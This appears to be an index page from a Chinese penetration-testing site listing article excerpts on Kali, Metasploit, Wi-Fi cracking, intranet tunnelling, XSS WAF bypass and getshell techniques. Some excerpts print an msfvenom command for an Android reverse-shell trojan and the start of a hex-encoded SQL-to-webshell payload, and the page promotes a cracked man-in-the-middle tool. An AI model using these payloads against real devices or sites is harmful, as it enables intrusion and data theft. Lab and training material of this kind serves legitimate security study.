安基网 首页 安全渗透测试
订阅

渗透测试

  • 白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下

    白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下
    1.安装好 Kali Linux 的虚拟机一台 2.搭建好Sql server的靶机一个; 3.整装待发的小白一个。
    2020-10-22 14:32
  • 白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描

    白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描
    在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。 命令:Win+R/cmd/firewall.cpl 3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。 命令:service postgresql start
    2020-10-1 09:45
  • 黑客破解wifi密码-超详细过程

    黑客破解wifi密码-超详细过程
    前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡(芯片为3070或者1887L都支持Linux)一.打开终端,用airmon-ng命令查看如果出现无法访问…没有那个文件或目录解决办 ...
    2020-9-29 09:45
  • 一次授权的渗透测试

    一次授权的渗透测试
    一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内 ...
    2020-9-7 10:06
  • 分享10个渗透测试最佳工具的使用方法及下载链接

    分享10个渗透测试最佳工具的使用方法及下载链接
    渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安 ...
    2020-9-1 08:49
  • 来路不明的安装包请勿安装

    来路不明的安装包请勿安装
    前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulate ...
    2020-9-1 08:43
  • 内网渗透:不出网渗透技巧

    内网渗透:不出网渗透技巧
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场作者:诺言转载自:https://www.freebuf.com/articles/web/247287.html前言最近打了几场**,遇到几个内网环境都不通外网,整理下用到的几种不出网内网渗透技巧。socks隧道搭建常用工具:reGeorg,Proxifier用的比较多的一个隧道代理工具1、 ...
    2020-8-30 07:16
  • 渗透测试工具库

    渗透测试工具库
    搜索公众号:暗网黑客可领全套网络安全渗透教程、配套攻防靶场本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinder 快速在网站的js文件中提取URL,子域名htt ...
    2020-8-30 07:14
  • 白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?

    白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?
    声明:本头条号分享仅做学习交流,请自觉遵守网络安全法等法律法规!据说点击了解更多,还有更多干货!但这干货有没有用,等你看了再说!一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:Tar ...
    2020-8-30 07:13
  • Web渗透测试——验证码自动识别工具

    Web渗透测试——验证码自动识别工具
    我们在网站登录界面,为了安全起见,除了填写用户名和密码之外,还会要求用户输入验证码才能进行登录,验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人,而不是某些程序模拟人的登录操作,这样就能有效地避免网站被攻击者进行暴力破解,从而非法获得网站的登录权限,验证码的种类也是多种 ...
    2020-8-22 16:17
  • ZanTI v3.18全功能完美中文版【网络渗透】

    ZanTI v3.18全功能完美中文版【网络渗透】
    这是一款安全测试工具,zANTI渗透测试,支持嗅探已连接的网络,来进行中间人攻击、端口扫描、cookie获取、路由安全、跑字典、抓包修改、远程控制、漏洞扫描、劫持等操作。该版本已汉化和免登录,需要root权限和busybox(瑞士小军刀),不可放vmos里运行哦。扫描网络功能开关最好玩的其实也是中间人, ...
    2020-8-18 03:37
  • 一次bypass Xss-waf的经历

    一次bypass Xss-waf的经历
    那原本是一个Happy的夜晚,我搞了二两小白酒,听到领导发来的消息,还TM喝酒,加班了! 接到测试网站,利用crawlergo+XRAY扫到了一个xss,这是入口点。打开网页长这个样子。 利用点在keyword参数
    2020-8-15 15:24
  • 黑客大神告诉你:Getshell总结

    黑客大神告诉你:Getshell总结
    无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。0x01 注入getshell一般前提条件:有权限、知道路径mysqlselect 0x3c3f70687020a6576616c28245f504f53545b6 ...
    2020-8-12 19:01
  • 工控渗透框架ISF介绍:信息收集篇

    工控渗透框架ISF介绍:信息收集篇
    框架介绍声明:ISF该框架是北京xx科技基于开源框架自研的一套工控渗透框架,仅用于工控安全教学,公司实验箱产品的安全研究,使用该框架进行非法操作产生的一切后果公司一概不负责。框架主要使用Python语言开发,通过集成ShadowBroker释放的NSA工具Fuzzbunch攻击框架,开发一款适合工控漏洞利用的框架 ...
    2020-8-10 01:30
  • 渗透测试——漏洞扫描工具整理

    渗透测试——漏洞扫描工具整理
    渗透测试收集信息完成后,就要根据所收集的信息,扫描目标站点可能存在的漏洞了,包括我们之前提到过的如:SQL注入漏洞、跨站脚本漏洞、文件上传漏洞、文件包含漏洞及命令执行漏洞等,通过这些已知的漏洞,来寻找目标站点的突破口,在这之前我们可能就已经接触过许多漏洞靶场,练习过各种漏洞的攻击方 ...
    2020-7-23 11:23
  • 最新
    返回顶部